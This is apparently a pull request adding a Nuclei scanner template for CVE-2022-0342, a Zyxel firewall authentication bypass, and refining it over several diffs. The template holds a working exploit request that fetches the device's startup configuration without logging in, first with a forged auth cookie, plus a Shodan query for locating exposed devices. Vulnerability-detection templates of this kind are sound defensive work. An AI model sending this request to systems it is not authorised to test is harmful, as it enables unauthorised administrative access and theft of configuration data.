### PR TITLE
Added template for CVE-2022-0342: Zyxel Authentication Bypass

### DIFF
--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -21,7 +21,7 @@ requests:
         GET /cgi-bin/export-cgi?category&argO=startup-config.conf
         Host: {{Hostname}}:8008
         Cookie: authtok=AAAAAAAA; secuRtBannerClsCookie=login
-    
+
     matchers-condition: and
     matchers:
       - type: word

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -5,17 +5,14 @@ info:
   author: Powerexploit
   severity: High
   description: An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
-
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
     - https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/
-  
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-0342 
     cwe-id: CWE-287
-
   tags: cve,cve2022,zyxel,auth-bypass
 
 requests:
@@ -32,7 +29,7 @@ requests:
         words:
           - "Firmware Version"
         condition: and
-      
+
       - type: status
         status:
           - 200

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-0342 
 
 info:
-  name:  Zyxel- Authentication Bypass
+  name: Zyxel- Authentication Bypass
   author: Powerexploit
   severity: high
   description: An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -1,4 +1,4 @@
-id: CVE-2022-0342 
+id: CVE-2022-0342
 
 info:
   name: Zyxel- Authentication Bypass

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -1,0 +1,38 @@
+id: CVE-2022-0342 
+
+info:
+  name:  Zyxel- Authentication Bypass
+  author: Powerexploit
+  severity: High
+  description: An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
+    - https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/
+  
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0342 
+    cwe-id: CWE-287
+
+  tags: cve,cve2022,zyxel,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /cgi-bin/export-cgi?category&argO=startup-config.conf
+        Host: {{Hostname}}:8008
+        Cookie: authtok=AAAAAAAA; secuRtBannerClsCookie=login
+    
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Firmware Version"
+        condition: and
+      
+      - type: status
+        status:
+          - 200

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -11,7 +11,7 @@ info:
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
-    cve-id: CVE-2022-0342 
+    cve-id: CVE-2022-0342
     cwe-id: CWE-287
   tags: cve,cve2022,zyxel,auth-bypass
 

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -18,7 +18,7 @@ info:
 requests:
   - raw:
       - |
-        GET /cgi-bin/export-cgi?category&argO=startup-config.conf
+        GET /cgi-bin/export-cgi?category&argO=startup-config.conf HTTP/1.1
         Host: {{Hostname}}:8008
         Cookie: authtok=AAAAAAAA; secuRtBannerClsCookie=login
 

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -3,7 +3,7 @@ id: CVE-2022-0342
 info:
   name:  Zyxel- Authentication Bypass
   author: Powerexploit
-  severity: High
+  severity: high
   description: An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0342

--- a/cves/2022/CVE-2022-0342.yaml
+++ b/cves/2022/CVE-2022-0342.yaml
@@ -1,34 +1,43 @@
 id: CVE-2022-0342
 
 info:
-  name: Zyxel- Authentication Bypass
+  name: Zyxel - Authentication Bypass
   author: Powerexploit
   severity: high
-  description: An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+  description: |
+    An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
     - https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CVE/2022/CVE-2022-0342.yaml
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-0342
     cwe-id: CWE-287
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"ZyWALL USG 20"
   tags: cve,cve2022,zyxel,auth-bypass
 
-requests:
+http:
   - raw:
       - |
         GET /cgi-bin/export-cgi?category&argO=startup-config.conf HTTP/1.1
-        Host: {{Hostname}}:8008
-        Cookie: authtok=AAAAAAAA; secuRtBannerClsCookie=login
+        Host: {{Host}}:8008
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "Firmware Version"
-        condition: and
+          - "interface-name"
+
+      - type: word
+        part: header
+        words:
+          - "text/zyxel"
 
       - type: status
         status:


### PR DESCRIPTION
### Template / PR Information
An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.

- References: https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)